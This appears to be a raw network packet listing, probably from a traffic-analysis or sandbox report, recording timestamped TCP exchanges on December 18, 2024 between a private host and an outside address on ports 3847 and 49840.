                                                                                                                                                Dec 18, 2024 19:27:21.863434076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.863473892 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.863512993 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.866213083 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.866358995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.866414070 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.867257118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.867403984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.867574930 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.868006945 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.868025064 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.868237019 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.869163990 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.869182110 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.869239092 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.870507002 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.870522976 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.870600939 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.871401072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.871714115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.871774912 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.872661114 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.872833967 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.872968912 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.873871088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.874028921 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.874092102 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.874953985 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.875102997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.875220060 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.876194000 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.876209974 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.876259089 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.877316952 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.877335072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.877393961 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.878421068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.878571033 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.878655910 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.879647017 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.879807949 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.879920006 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.880712986 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.880872011 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.880925894 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.882064104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.882209063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.882262945 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:21.883119106 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:21.925493002 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.014568090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.014739990 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.014837027 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.015047073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.015305042 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.015369892 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.015497923 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.016536951 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.016575098 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.016597033 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.017472982 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.017785072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.017843008 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.018908024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.018943071 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.018968105 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.020134926 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.020190001 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.020195961 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.021204948 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.021244049 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.021280050 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.022181034 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.022217035 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.022238016 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.023447990 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.023502111 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.023511887 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.024755001 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.024790049 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.024825096 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.025827885 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.025878906 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.026000023 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.027071953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.027107000 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.027128935 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.028230906 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.028280020 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.028384924 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.029232025 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.029287100 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.029319048 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.030381918 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.030440092 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.030536890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.031595945 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.031611919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.031658888 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.032780886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.032798052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.032847881 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.033979893 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.033998013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.034029007 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.035299063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.035366058 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.035423994 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.036345005 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.036381960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.036401033 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.037431955 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.037482023 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.037563086 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.038666010 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.038726091 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.038774967 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.039751053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.039784908 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.039805889 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.040987015 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.041023016 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.041043997 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.042058945 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.042119980 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.042139053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.043356895 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.043392897 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.043427944 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.044433117 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.044470072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.044536114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.045530081 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.045564890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.045584917 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.046612978 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.046670914 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.046797991 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.046950102 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.046984911 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.047034979 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.049175024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.049225092 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.049290895 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.050218105 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.050324917 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.050369978 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.051331997 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.051386118 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.051454067 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.052366972 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.052402020 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.052426100 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.053503990 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.053554058 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.053647995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.054677010 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.054723024 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.054836988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.055000067 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.055036068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.055058002 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.056694031 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.056731939 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.056788921 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.058186054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.058222055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.058242083 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.059395075 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.059431076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.059458017 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.060415030 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.060472965 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.060575962 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.061621904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.061669111 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.061757088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.062786102 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.062844992 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.062957048 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.063991070 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.064152956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.064196110 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.065191031 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.065268993 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.065351963 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.066245079 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.066293001 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.066361904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.067395926 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.067552090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.067605019 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.068625927 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.068686962 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.068795919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.069791079 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.069827080 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.069849014 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.070987940 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.071036100 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.071171999 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.072176933 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.072211981 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.072232008 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.073199987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.073281050 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.073395014 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.074440956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.074493885 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.074615955 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.128622055 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.205348969 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.205455065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.205513000 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.205801964 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.206310987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.206346989 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.206368923 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.207109928 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.207163095 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.207679033 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.208655119 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.208719015 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.208795071 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.209656954 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.209708929 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.209835052 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.210796118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.210860014 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.210951090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.211865902 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.211918116 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.212018013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.213059902 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.213130951 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.213215113 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.214231968 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.214306116 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.214405060 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.215374947 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.215435028 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.215550900 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.216439962 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.216506004 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.216609001 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.217775106 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.217811108 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.217818975 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.218760014 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.218810081 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.218885899 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.219986916 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.220024109 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.220038891 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.221133947 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.221169949 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.221199036 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.222408056 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.222443104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.222470045 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.223484993 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.223536015 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.223741055 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.224591970 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.224659920 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.224761009 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.225712061 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.225770950 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.225835085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.226722956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.226774931 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.226896048 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.227896929 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.227956057 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.228040934 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.230986118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.231021881 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.231054068 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.231059074 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.231095076 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.231132030 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.231544018 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.231594086 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.231707096 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.232801914 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.232872009 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.232954979 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.233913898 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.233948946 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.233966112 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.234822035 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.234883070 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.235166073 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.235980034 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.236037016 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.236063957 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.237148046 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.237198114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.237440109 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.238401890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.238437891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.238460064 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.239567995 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.239604950 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.239619017 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.240642071 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:22.240706921 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:22.240720987 CET38474984087.120.127.215192.168.2.4
